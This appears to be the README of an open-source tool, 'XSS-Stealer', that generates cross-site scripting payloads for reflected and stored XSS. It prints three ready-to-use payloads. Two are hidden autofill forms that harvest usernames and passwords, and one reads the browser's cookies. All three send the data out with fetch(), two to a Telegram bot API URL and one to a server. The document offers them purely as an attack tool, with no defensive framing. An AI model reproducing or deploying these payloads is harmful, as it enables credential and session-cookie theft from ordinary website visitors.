Simple utility to generate XSS-based stealers.
Install requirements:
pip install -r requirements.txtRun:
python -m stealerSteals the password and login using form autofill and sends it to the Telegram Bot.
XSS-Types:
- Reflected
- Stored
Result code:
<form style="display: none" onchange="fetch(`https://api.telegram.org/bot123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11/sendMessage?text=${this.u.value};${this.p.value}&chat_id=123123123`)"><input id="u" autocomplete="username"><input id="p" type="password" autocomplete="password"></form>Steals the cookies and sends it to the Telegram Bot.
XSS-Types:
- Reflected
- Stored
Result code:
<script>fetch(`https://api.telegram.org/bot123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11/sendMessage?text=${document.cookie}&chat_id=123123123`)</script>Steals the password and login using form autofill and sends it to the Server.
XSS-Types:
- Reflected
- Stored
<form style="display: none" onchange="fetch(`https://example.com?c=${this.u.value};${this.p.value}`)"><input id="u" autocomplete="username"><input id="p" type="password" autocomplete="password"></form>XSS-Stealer is released under the MIT License. See the bundled LICENSE file for details.